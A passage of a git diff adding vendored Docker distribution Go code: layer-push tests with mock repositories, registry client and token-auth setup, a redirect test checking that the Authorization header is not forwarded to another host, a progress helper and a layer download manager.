map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}}, + expectedExists: false, + expectedRequests: []string{"banana", "plum", "apple"}, + expectedRemovals: []metadata.V2Metadata{ + {Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"}, + 
{Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"}, + }, + }, + { + name: "zero allowed existence checks", + targetRepo: "user/app", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("pear"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"}, + {Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"}, + }, + maxExistenceChecks: 0, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}}, + }, + { + name: "stat single digest just once", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{ + taggedMetadata("key1", "pear", "docker.io/library/busybox"), + taggedMetadata("key2", "apple", "docker.io/library/busybox"), + taggedMetadata("key3", "apple", "docker.io/library/busybox"), + }, + maxExistenceChecks: 3, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}}, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("pear"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"apple", "pear"}, + expectedAdditions: []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}}, + expectedRemovals: []metadata.V2Metadata{taggedMetadata("key3", "apple", "docker.io/library/busybox")}, + }, + { + name: "don't stop on first error", + targetRepo: "user/app", + hmacKey: "key", + metadata: []metadata.V2Metadata{ + taggedMetadata("key", "banana", "docker.io/user/app"), + taggedMetadata("key", "orange", "docker.io/user/app"), + taggedMetadata("key", "plum", "docker.io/user/app"), + }, + maxExistenceChecks: 3, + remoteErrors: map[digest.Digest]error{"orange": distribution.ErrAccessDenied}, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {}}, + 
expectedError: nil, + expectedRequests: []string{"plum", "orange", "banana"}, + expectedRemovals: []metadata.V2Metadata{ + taggedMetadata("key", "plum", "docker.io/user/app"), + taggedMetadata("key", "banana", "docker.io/user/app"), + }, + }, + { + name: "remove outdated metadata", + targetRepo: "docker.io/user/app", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"}, + {Digest: digest.Digest("orange"), SourceRepository: "docker.io/user/app"}, + }, + maxExistenceChecks: 3, + remoteErrors: map[digest.Digest]error{"orange": distribution.ErrBlobUnknown}, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("plum"): {}}, + expectedExists: false, + expectedRequests: []string{"orange"}, + expectedRemovals: []metadata.V2Metadata{{Digest: digest.Digest("orange"), SourceRepository: "docker.io/user/app"}}, + }, + { + name: "missing SourceRepository", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("1")}, + {Digest: digest.Digest("3")}, + {Digest: digest.Digest("2")}, + }, + maxExistenceChecks: 3, + expectedExists: false, + expectedRequests: []string{"2", "3", "1"}, + }, + + { + name: "with and without SourceRepository", + targetRepo: "busybox", + metadata: []metadata.V2Metadata{ + {Digest: digest.Digest("1")}, + {Digest: digest.Digest("2"), SourceRepository: "docker.io/library/busybox"}, + {Digest: digest.Digest("3")}, + }, + remoteBlobs: map[digest.Digest]distribution.Descriptor{digest.Digest("1"): {Digest: digest.Digest("1")}}, + maxExistenceChecks: 3, + expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("1"), MediaType: schema2.MediaTypeLayer}, + expectedExists: true, + expectedRequests: []string{"2", "3", "1"}, + expectedAdditions: []metadata.V2Metadata{{Digest: digest.Digest("1"), SourceRepository: "docker.io/library/busybox"}}, + expectedRemovals: []metadata.V2Metadata{ + {Digest: digest.Digest("2"), SourceRepository: 
"docker.io/library/busybox"}, + }, + }, + } { + repoInfo, err := reference.ParseNamed(tc.targetRepo) + if err != nil { + t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err) + } + repo := &mockRepo{ + t: t, + errors: tc.remoteErrors, + blobs: tc.remoteBlobs, + requests: []string{}, + } + ctx := context.Background() + ms := &mockV2MetadataService{} + pd := &v2PushDescriptor{ + hmacKey: []byte(tc.hmacKey), + repoInfo: repoInfo, + layer: &storeLayer{ + Layer: layer.EmptyLayer, + }, + repo: repo, + v2MetadataService: ms, + pushState: &pushState{remoteLayers: make(map[layer.DiffID]distribution.Descriptor)}, + checkedDigests: make(map[digest.Digest]struct{}), + } + + desc, exists, err := pd.layerAlreadyExists(ctx, &progressSink{t}, layer.EmptyLayer.DiffID(), tc.checkOtherRepositories, tc.maxExistenceChecks, tc.metadata) + + if !reflect.DeepEqual(desc, tc.expectedDescriptor) { + t.Errorf("[%s] got unexpected descriptor: %#+v != %#+v", tc.name, desc, tc.expectedDescriptor) + } + if exists != tc.expectedExists { + t.Errorf("[%s] got unexpected exists: %t != %t", tc.name, exists, tc.expectedExists) + } + if !reflect.DeepEqual(err, tc.expectedError) { + t.Errorf("[%s] got unexpected error: %#+v != %#+v", tc.name, err, tc.expectedError) + } + + if len(repo.requests) != len(tc.expectedRequests) { + t.Errorf("[%s] got unexpected number of requests: %d != %d", tc.name, len(repo.requests), len(tc.expectedRequests)) + } + for i := 0; i < len(repo.requests) && i < len(tc.expectedRequests); i++ { + if repo.requests[i] != tc.expectedRequests[i] { + t.Errorf("[%s] request %d does not match expected: %q != %q", tc.name, i, repo.requests[i], tc.expectedRequests[i]) + } + } + for i := len(repo.requests); i < len(tc.expectedRequests); i++ { + t.Errorf("[%s] missing expected request at position %d (%q)", tc.name, i, tc.expectedRequests[i]) + } + for i := len(tc.expectedRequests); i < len(repo.requests); i++ { + t.Errorf("[%s] got unexpected request at position %d (%q)", 
tc.name, i, repo.requests[i]) + } + + if len(ms.added) != len(tc.expectedAdditions) { + t.Errorf("[%s] got unexpected number of additions: %d != %d", tc.name, len(ms.added), len(tc.expectedAdditions)) + } + for i := 0; i < len(ms.added) && i < len(tc.expectedAdditions); i++ { + if ms.added[i] != tc.expectedAdditions[i] { + t.Errorf("[%s] added metadata at %d does not match expected: %q != %q", tc.name, i, ms.added[i], tc.expectedAdditions[i]) + } + } + for i := len(ms.added); i < len(tc.expectedAdditions); i++ { + t.Errorf("[%s] missing expected addition at position %d (%q)", tc.name, i, tc.expectedAdditions[i]) + } + for i := len(tc.expectedAdditions); i < len(ms.added); i++ { + t.Errorf("[%s] unexpected metadata addition at position %d (%q)", tc.name, i, ms.added[i]) + } + + if len(ms.removed) != len(tc.expectedRemovals) { + t.Errorf("[%s] got unexpected number of removals: %d != %d", tc.name, len(ms.removed), len(tc.expectedRemovals)) + } + for i := 0; i < len(ms.removed) && i < len(tc.expectedRemovals); i++ { + if ms.removed[i] != tc.expectedRemovals[i] { + t.Errorf("[%s] removed metadata at %d does not match expected: %q != %q", tc.name, i, ms.removed[i], tc.expectedRemovals[i]) + } + } + for i := len(ms.removed); i < len(tc.expectedRemovals); i++ { + t.Errorf("[%s] missing expected removal at position %d (%q)", tc.name, i, tc.expectedRemovals[i]) + } + for i := len(tc.expectedRemovals); i < len(ms.removed); i++ { + t.Errorf("[%s] removed unexpected metadata at position %d (%q)", tc.name, i, ms.removed[i]) + } + } +} + +func taggedMetadata(key string, dgst string, sourceRepo string) metadata.V2Metadata { + meta := metadata.V2Metadata{ + Digest: digest.Digest(dgst), + SourceRepository: sourceRepo, + } + + meta.HMAC = metadata.ComputeV2MetadataHMAC([]byte(key), &meta) + return meta +} + +type mockRepo struct { + t *testing.T + errors map[digest.Digest]error + blobs map[digest.Digest]distribution.Descriptor + requests []string +} + +var _ distribution.Repository 
= &mockRepo{} + +func (m *mockRepo) Named() distreference.Named { + m.t.Fatalf("Named() not implemented") + return nil +} +func (m *mockRepo) Manifests(ctc context.Context, options ...distribution.ManifestServiceOption) (distribution.ManifestService, error) { + m.t.Fatalf("Manifests() not implemented") + return nil, nil +} +func (m *mockRepo) Tags(ctc context.Context) distribution.TagService { + m.t.Fatalf("Tags() not implemented") + return nil +} +func (m *mockRepo) Blobs(ctx context.Context) distribution.BlobStore { + return &mockBlobStore{ + repo: m, + } +} + +type mockBlobStore struct { + repo *mockRepo +} + +var _ distribution.BlobStore = &mockBlobStore{} + +func (m *mockBlobStore) Stat(ctx context.Context, dgst digest.Digest) (distribution.Descriptor, error) { + m.repo.requests = append(m.repo.requests, dgst.String()) + if err, exists := m.repo.errors[dgst]; exists { + return distribution.Descriptor{}, err + } + if desc, exists := m.repo.blobs[dgst]; exists { + return desc, nil + } + return distribution.Descriptor{}, distribution.ErrBlobUnknown +} +func (m *mockBlobStore) Get(ctx context.Context, dgst digest.Digest) ([]byte, error) { + m.repo.t.Fatal("Get() not implemented") + return nil, nil +} + +func (m *mockBlobStore) Open(ctx context.Context, dgst digest.Digest) (distribution.ReadSeekCloser, error) { + m.repo.t.Fatal("Open() not implemented") + return nil, nil +} + +func (m *mockBlobStore) Put(ctx context.Context, mediaType string, p []byte) (distribution.Descriptor, error) { + m.repo.t.Fatal("Put() not implemented") + return distribution.Descriptor{}, nil +} + +func (m *mockBlobStore) Create(ctx context.Context, options ...distribution.BlobCreateOption) (distribution.BlobWriter, error) { + m.repo.t.Fatal("Create() not implemented") + return nil, nil +} +func (m *mockBlobStore) Resume(ctx context.Context, id string) (distribution.BlobWriter, error) { + m.repo.t.Fatal("Resume() not implemented") + return nil, nil +} +func (m *mockBlobStore) Delete(ctx 
context.Context, dgst digest.Digest) error { + m.repo.t.Fatal("Delete() not implemented") + return nil +} +func (m *mockBlobStore) ServeBlob(ctx context.Context, w http.ResponseWriter, r *http.Request, dgst digest.Digest) error { + m.repo.t.Fatalf("ServeBlob() not implemented") + return nil +} + +type mockV2MetadataService struct { + added []metadata.V2Metadata + removed []metadata.V2Metadata +} + +var _ metadata.V2MetadataService = &mockV2MetadataService{} + +func (*mockV2MetadataService) GetMetadata(diffID layer.DiffID) ([]metadata.V2Metadata, error) { + return nil, nil +} +func (*mockV2MetadataService) GetDiffID(dgst digest.Digest) (layer.DiffID, error) { + return "", nil +} +func (m *mockV2MetadataService) Add(diffID layer.DiffID, metadata metadata.V2Metadata) error { + m.added = append(m.added, metadata) + return nil +} +func (m *mockV2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, meta metadata.V2Metadata) error { + meta.HMAC = metadata.ComputeV2MetadataHMAC(hmacKey, &meta) + m.Add(diffID, meta) + return nil +} +func (m *mockV2MetadataService) Remove(metadata metadata.V2Metadata) error { + m.removed = append(m.removed, metadata) + return nil +} + +type progressSink struct { + t *testing.T +} + +func (s *progressSink) WriteProgress(p progress.Progress) error { + s.t.Logf("progress update: %#+v", p) + return nil +} diff --git a/vendor/github.com/docker/docker/distribution/registry.go b/vendor/github.com/docker/docker/distribution/registry.go new file mode 100644 index 0000000000..95e181ded8 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/registry.go @@ -0,0 +1,156 @@ +package distribution + +import ( + "fmt" + "net" + "net/http" + "time" + + "github.com/docker/distribution" + "github.com/docker/distribution/manifest/schema2" + distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/client" + "github.com/docker/distribution/registry/client/auth" + 
"github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/registry" + "github.com/docker/go-connections/sockets" + "golang.org/x/net/context" +) + +// ImageTypes represents the schema2 config types for images +var ImageTypes = []string{ + schema2.MediaTypeImageConfig, + // Handle unexpected values from https://github.com/docker/distribution/issues/1621 + // (see also https://github.com/docker/docker/issues/22378, + // https://github.com/docker/docker/issues/30083) + "application/octet-stream", + "application/json", + "text/html", + // Treat defaulted values as images, newer types cannot be implied + "", +} + +// PluginTypes represents the schema2 config types for plugins +var PluginTypes = []string{ + schema2.MediaTypePluginConfig, +} + +var mediaTypeClasses map[string]string + +func init() { + // initialize media type classes with all know types for + // plugin + mediaTypeClasses = map[string]string{} + for _, t := range ImageTypes { + mediaTypeClasses[t] = "image" + } + for _, t := range PluginTypes { + mediaTypeClasses[t] = "plugin" + } +} + +// NewV2Repository returns a repository (v2 only). It creates an HTTP transport +// providing timeout settings and authentication support, and also verifies the +// remote API version. 
+func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, endpoint registry.APIEndpoint, metaHeaders http.Header, authConfig *types.AuthConfig, actions ...string) (repo distribution.Repository, foundVersion bool, err error) { + repoName := repoInfo.FullName() + // If endpoint does not support CanonicalName, use the RemoteName instead + if endpoint.TrimHostname { + repoName = repoInfo.RemoteName() + } + + direct := &net.Dialer{ + Timeout: 30 * time.Second, + KeepAlive: 30 * time.Second, + DualStack: true, + } + + // TODO(dmcgowan): Call close idle connections when complete, use keep alive + base := &http.Transport{ + Proxy: http.ProxyFromEnvironment, + Dial: direct.Dial, + TLSHandshakeTimeout: 10 * time.Second, + TLSClientConfig: endpoint.TLSConfig, + // TODO(dmcgowan): Call close idle connections when complete and use keep alive + DisableKeepAlives: true, + } + + proxyDialer, err := sockets.DialerFromEnvironment(direct) + if err == nil { + base.Dial = proxyDialer.Dial + } + + modifiers := registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), metaHeaders) + authTransport := transport.NewTransport(base, modifiers...) 
+ + challengeManager, foundVersion, err := registry.PingV2Registry(endpoint.URL, authTransport) + if err != nil { + transportOK := false + if responseErr, ok := err.(registry.PingResponseError); ok { + transportOK = true + err = responseErr.Err + } + return nil, foundVersion, fallbackError{ + err: err, + confirmedV2: foundVersion, + transportOK: transportOK, + } + } + + if authConfig.RegistryToken != "" { + passThruTokenHandler := &existingTokenHandler{token: authConfig.RegistryToken} + modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, passThruTokenHandler)) + } else { + scope := auth.RepositoryScope{ + Repository: repoName, + Actions: actions, + Class: repoInfo.Class, + } + + creds := registry.NewStaticCredentialStore(authConfig) + tokenHandlerOptions := auth.TokenHandlerOptions{ + Transport: authTransport, + Credentials: creds, + Scopes: []auth.Scope{scope}, + ClientID: registry.AuthClientID, + } + tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions) + basicHandler := auth.NewBasicHandler(creds) + modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler)) + } + tr := transport.NewTransport(base, modifiers...) 
+ + repoNameRef, err := distreference.ParseNamed(repoName) + if err != nil { + return nil, foundVersion, fallbackError{ + err: err, + confirmedV2: foundVersion, + transportOK: true, + } + } + + repo, err = client.NewRepository(ctx, repoNameRef, endpoint.URL.String(), tr) + if err != nil { + err = fallbackError{ + err: err, + confirmedV2: foundVersion, + transportOK: true, + } + } + return +} + +type existingTokenHandler struct { + token string +} + +func (th *existingTokenHandler) Scheme() string { + return "bearer" +} + +func (th *existingTokenHandler) AuthorizeRequest(req *http.Request, params map[string]string) error { + req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", th.token)) + return nil +} diff --git a/vendor/github.com/docker/docker/distribution/registry_unit_test.go b/vendor/github.com/docker/docker/distribution/registry_unit_test.go new file mode 100644 index 0000000000..406de34915 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/registry_unit_test.go @@ -0,0 +1,136 @@ +package distribution + +import ( + "net/http" + "net/http/httptest" + "net/url" + "os" + "strings" + "testing" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/docker/utils" + "golang.org/x/net/context" +) + +const secretRegistryToken = "mysecrettoken" + +type tokenPassThruHandler struct { + reached bool + gotToken bool + shouldSend401 func(url string) bool +} + +func (h *tokenPassThruHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) { + h.reached = true + if strings.Contains(r.Header.Get("Authorization"), secretRegistryToken) { + logrus.Debug("Detected registry token in auth header") + h.gotToken = true + } + if h.shouldSend401 == nil || h.shouldSend401(r.RequestURI) { + w.Header().Set("WWW-Authenticate", `Bearer realm="foorealm"`) + w.WriteHeader(401) + } +} + +func 
testTokenPassThru(t *testing.T, ts *httptest.Server) { + tmp, err := utils.TestDirectory("") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + uri, err := url.Parse(ts.URL) + if err != nil { + t.Fatalf("could not parse url from test server: %v", err) + } + + endpoint := registry.APIEndpoint{ + Mirror: false, + URL: uri, + Version: 2, + Official: false, + TrimHostname: false, + TLSConfig: nil, + //VersionHeader: "verheader", + } + n, _ := reference.ParseNamed("testremotename") + repoInfo := ®istry.RepositoryInfo{ + Named: n, + Index: ®istrytypes.IndexInfo{ + Name: "testrepo", + Mirrors: nil, + Secure: false, + Official: false, + }, + Official: false, + } + imagePullConfig := &ImagePullConfig{ + Config: Config{ + MetaHeaders: http.Header{}, + AuthConfig: &types.AuthConfig{ + RegistryToken: secretRegistryToken, + }, + }, + Schema2Types: ImageTypes, + } + puller, err := newPuller(endpoint, repoInfo, imagePullConfig) + if err != nil { + t.Fatal(err) + } + p := puller.(*v2Puller) + ctx := context.Background() + p.repo, _, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull") + if err != nil { + t.Fatal(err) + } + + logrus.Debug("About to pull") + // We expect it to fail, since we haven't mock'd the full registry exchange in our handler above + tag, _ := reference.WithTag(n, "tag_goes_here") + _ = p.pullV2Repository(ctx, tag) +} + +func TestTokenPassThru(t *testing.T) { + handler := &tokenPassThruHandler{shouldSend401: func(url string) bool { return url == "/v2/" }} + ts := httptest.NewServer(handler) + defer ts.Close() + + testTokenPassThru(t, ts) + + if !handler.reached { + t.Fatal("Handler not reached") + } + if !handler.gotToken { + t.Fatal("Failed to receive registry token") + } +} + +func TestTokenPassThruDifferentHost(t *testing.T) { + handler := new(tokenPassThruHandler) + ts := httptest.NewServer(handler) + defer ts.Close() + + tsredirect := httptest.NewServer(http.HandlerFunc(func(w 
http.ResponseWriter, r *http.Request) { + if r.RequestURI == "/v2/" { + w.Header().Set("WWW-Authenticate", `Bearer realm="foorealm"`) + w.WriteHeader(401) + return + } + http.Redirect(w, r, ts.URL+r.URL.Path, http.StatusMovedPermanently) + })) + defer tsredirect.Close() + + testTokenPassThru(t, tsredirect) + + if !handler.reached { + t.Fatal("Handler not reached") + } + if handler.gotToken { + t.Fatal("Redirect should not forward Authorization header to another host") + } +} diff --git a/vendor/github.com/docker/docker/distribution/utils/progress.go b/vendor/github.com/docker/docker/distribution/utils/progress.go new file mode 100644 index 0000000000..ef8ecc89f6 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/utils/progress.go @@ -0,0 +1,44 @@ +package utils + +import ( + "io" + "net" + "os" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" +) + +// WriteDistributionProgress is a helper for writing progress from chan to JSON +// stream with an optional cancel function. +func WriteDistributionProgress(cancelFunc func(), outStream io.Writer, progressChan <-chan progress.Progress) { + progressOutput := streamformatter.NewJSONStreamFormatter().NewProgressOutput(outStream, false) + operationCancelled := false + + for prog := range progressChan { + if err := progressOutput.WriteProgress(prog); err != nil && !operationCancelled { + // don't log broken pipe errors as this is the normal case when a client aborts + if isBrokenPipe(err) { + logrus.Info("Pull session cancelled") + } else { + logrus.Errorf("error writing progress to client: %v", err) + } + cancelFunc() + operationCancelled = true + // Don't return, because we need to continue draining + // progressChan until it's closed to avoid a deadlock. 
+ } + } +} + +func isBrokenPipe(e error) bool { + if netErr, ok := e.(*net.OpError); ok { + e = netErr.Err + if sysErr, ok := netErr.Err.(*os.SyscallError); ok { + e = sysErr.Err + } + } + return e == syscall.EPIPE +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/download.go b/vendor/github.com/docker/docker/distribution/xfer/download.go new file mode 100644 index 0000000000..7545342212 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/download.go @@ -0,0 +1,452 @@ +package xfer + +import ( + "errors" + "fmt" + "io" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +const maxDownloadAttempts = 5 + +// LayerDownloadManager figures out which layers need to be downloaded, then +// registers and downloads those, taking into account dependencies between +// layers. +type LayerDownloadManager struct { + layerStore layer.Store + tm TransferManager +} + +// SetConcurrency set the max concurrent downloads for each pull +func (ldm *LayerDownloadManager) SetConcurrency(concurrency int) { + ldm.tm.SetConcurrency(concurrency) +} + +// NewLayerDownloadManager returns a new LayerDownloadManager. +func NewLayerDownloadManager(layerStore layer.Store, concurrencyLimit int) *LayerDownloadManager { + return &LayerDownloadManager{ + layerStore: layerStore, + tm: NewTransferManager(concurrencyLimit), + } +} + +type downloadTransfer struct { + Transfer + + layerStore layer.Store + layer layer.Layer + err error +} + +// result returns the layer resulting from the download, if the download +// and registration were successful. +func (d *downloadTransfer) result() (layer.Layer, error) { + return d.layer, d.err +} + +// A DownloadDescriptor references a layer that may need to be downloaded. 
+type DownloadDescriptor interface { + // Key returns the key used to deduplicate downloads. + Key() string + // ID returns the ID for display purposes. + ID() string + // DiffID should return the DiffID for this layer, or an error + // if it is unknown (for example, if it has not been downloaded + // before). + DiffID() (layer.DiffID, error) + // Download is called to perform the download. + Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) + // Close is called when the download manager is finished with this + // descriptor and will not call Download again or read from the reader + // that Download returned. + Close() +} + +// DownloadDescriptorWithRegistered is a DownloadDescriptor that has an +// additional Registered method which gets called after a downloaded layer is +// registered. This allows the user of the download manager to know the DiffID +// of each registered layer. This method is called if a cast to +// DownloadDescriptorWithRegistered is successful. +type DownloadDescriptorWithRegistered interface { + DownloadDescriptor + Registered(diffID layer.DiffID) +} + +// Download is a blocking function which ensures the requested layers are +// present in the layer store. It uses the string returned by the Key method to +// deduplicate downloads. If a given layer is not already known to present in +// the layer store, and the key is not used by an in-progress download, the +// Download method is called to get the layer tar data. Layers are then +// registered in the appropriate order. The caller must call the returned +// release function once it is is done with the returned RootFS object. 
+func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { + var ( + topLayer layer.Layer + topDownload *downloadTransfer + watcher *Watcher + missingLayer bool + transferKey = "" + downloadsByKey = make(map[string]*downloadTransfer) + ) + + rootFS := initialRootFS + for _, descriptor := range layers { + key := descriptor.Key() + transferKey += key + + if !missingLayer { + missingLayer = true + diffID, err := descriptor.DiffID() + if err == nil { + getRootFS := rootFS + getRootFS.Append(diffID) + l, err := ldm.layerStore.Get(getRootFS.ChainID()) + if err == nil { + // Layer already exists. + logrus.Debugf("Layer already exists: %s", descriptor.ID()) + progress.Update(progressOutput, descriptor.ID(), "Already exists") + if topLayer != nil { + layer.ReleaseAndLog(ldm.layerStore, topLayer) + } + topLayer = l + missingLayer = false + rootFS.Append(diffID) + continue + } + } + } + + // Does this layer have the same data as a previous layer in + // the stack? If so, avoid downloading it more than once. + var topDownloadUncasted Transfer + if existingDownload, ok := downloadsByKey[key]; ok { + xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload) + defer topDownload.Transfer.Release(watcher) + topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput) + topDownload = topDownloadUncasted.(*downloadTransfer) + continue + } + + // Layer is not known to exist - download and register it. 
+ progress.Update(progressOutput, descriptor.ID(), "Pulling fs layer") + + var xferFunc DoFunc + if topDownload != nil { + xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload) + defer topDownload.Transfer.Release(watcher) + } else { + xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil) + } + topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput) + topDownload = topDownloadUncasted.(*downloadTransfer) + downloadsByKey[key] = topDownload + } + + if topDownload == nil { + return rootFS, func() { + if topLayer != nil { + layer.ReleaseAndLog(ldm.layerStore, topLayer) + } + }, nil + } + + // Won't be using the list built up so far - will generate it + // from downloaded layers instead. + rootFS.DiffIDs = []layer.DiffID{} + + defer func() { + if topLayer != nil { + layer.ReleaseAndLog(ldm.layerStore, topLayer) + } + }() + + select { + case <-ctx.Done(): + topDownload.Transfer.Release(watcher) + return rootFS, func() {}, ctx.Err() + case <-topDownload.Done(): + break + } + + l, err := topDownload.result() + if err != nil { + topDownload.Transfer.Release(watcher) + return rootFS, func() {}, err + } + + // Must do this exactly len(layers) times, so we don't include the + // base layer on Windows. + for range layers { + if l == nil { + topDownload.Transfer.Release(watcher) + return rootFS, func() {}, errors.New("internal error: too few parent layers") + } + rootFS.DiffIDs = append([]layer.DiffID{l.DiffID()}, rootFS.DiffIDs...) + l = l.Parent() + } + return rootFS, func() { topDownload.Transfer.Release(watcher) }, err +} + +// makeDownloadFunc returns a function that performs the layer download and +// registration. If parentDownload is non-nil, it waits for that download to +// complete before the registration step, and registers the downloaded data +// on top of parentDownload's resulting layer. Otherwise, it registers the +// layer on top of the ChainID given by parentLayer. 
+func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + d := &downloadTransfer{ + Transfer: NewTransfer(), + layerStore: ldm.layerStore, + } + + go func() { + defer func() { + close(progressChan) + }() + + progressOutput := progress.ChanOutput(progressChan) + + select { + case <-start: + default: + progress.Update(progressOutput, descriptor.ID(), "Waiting") + <-start + } + + if parentDownload != nil { + // Did the parent download already fail or get + // cancelled? + select { + case <-parentDownload.Done(): + _, err := parentDownload.result() + if err != nil { + d.err = err + return + } + default: + } + } + + var ( + downloadReader io.ReadCloser + size int64 + err error + retries int + ) + + defer descriptor.Close() + + for { + downloadReader, size, err = descriptor.Download(d.Transfer.Context(), progressOutput) + if err == nil { + break + } + + // If an error was returned because the context + // was cancelled, we shouldn't retry. 
+ select { + case <-d.Transfer.Context().Done(): + d.err = err + return + default: + } + + retries++ + if _, isDNR := err.(DoNotRetry); isDNR || retries == maxDownloadAttempts { + logrus.Errorf("Download failed: %v", err) + d.err = err + return + } + + logrus.Errorf("Download failed, retrying: %v", err) + delay := retries * 5 + ticker := time.NewTicker(time.Second) + + selectLoop: + for { + progress.Updatef(progressOutput, descriptor.ID(), "Retrying in %d second%s", delay, (map[bool]string{true: "s"})[delay != 1]) + select { + case <-ticker.C: + delay-- + if delay == 0 { + ticker.Stop() + break selectLoop + } + case <-d.Transfer.Context().Done(): + ticker.Stop() + d.err = errors.New("download cancelled during retry delay") + return + } + + } + } + + close(inactive) + + if parentDownload != nil { + select { + case <-d.Transfer.Context().Done(): + d.err = errors.New("layer registration cancelled") + downloadReader.Close() + return + case <-parentDownload.Done(): + } + + l, err := parentDownload.result() + if err != nil { + d.err = err + downloadReader.Close() + return + } + parentLayer = l.ChainID() + } + + reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(d.Transfer.Context(), downloadReader), progressOutput, size, descriptor.ID(), "Extracting") + defer reader.Close() + + inflatedLayerData, err := archive.DecompressStream(reader) + if err != nil { + d.err = fmt.Errorf("could not get decompression stream: %v", err) + return + } + + var src distribution.Descriptor + if fs, ok := descriptor.(distribution.Describable); ok { + src = fs.Descriptor() + } + if ds, ok := d.layerStore.(layer.DescribableStore); ok { + d.layer, err = ds.RegisterWithDescriptor(inflatedLayerData, parentLayer, src) + } else { + d.layer, err = d.layerStore.Register(inflatedLayerData, parentLayer) + } + if err != nil { + select { + case <-d.Transfer.Context().Done(): + d.err = errors.New("layer registration cancelled") + default: + d.err = fmt.Errorf("failed to register layer: %v", 
err) + } + return + } + + progress.Update(progressOutput, descriptor.ID(), "Pull complete") + withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered) + if hasRegistered { + withRegistered.Registered(d.layer.DiffID()) + } + + // Doesn't actually need to be its own goroutine, but + // done like this so we can defer close(c). + go func() { + <-d.Transfer.Released() + if d.layer != nil { + layer.ReleaseAndLog(d.layerStore, d.layer) + } + }() + }() + + return d + } +} + +// makeDownloadFuncFromDownload returns a function that performs the layer +// registration when the layer data is coming from an existing download. It +// waits for sourceDownload and parentDownload to complete, and then +// reregisters the data from sourceDownload's top layer on top of +// parentDownload. This function does not log progress output because it would +// interfere with the progress reporting for sourceDownload, which has the same +// Key. +func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + d := &downloadTransfer{ + Transfer: NewTransfer(), + layerStore: ldm.layerStore, + } + + go func() { + defer func() { + close(progressChan) + }() + + <-start + + close(inactive) + + select { + case <-d.Transfer.Context().Done(): + d.err = errors.New("layer registration cancelled") + return + case <-parentDownload.Done(): + } + + l, err := parentDownload.result() + if err != nil { + d.err = err + return + } + parentLayer := l.ChainID() + + // sourceDownload should have already finished if + // parentDownload finished, but wait for it explicitly + // to be sure. 
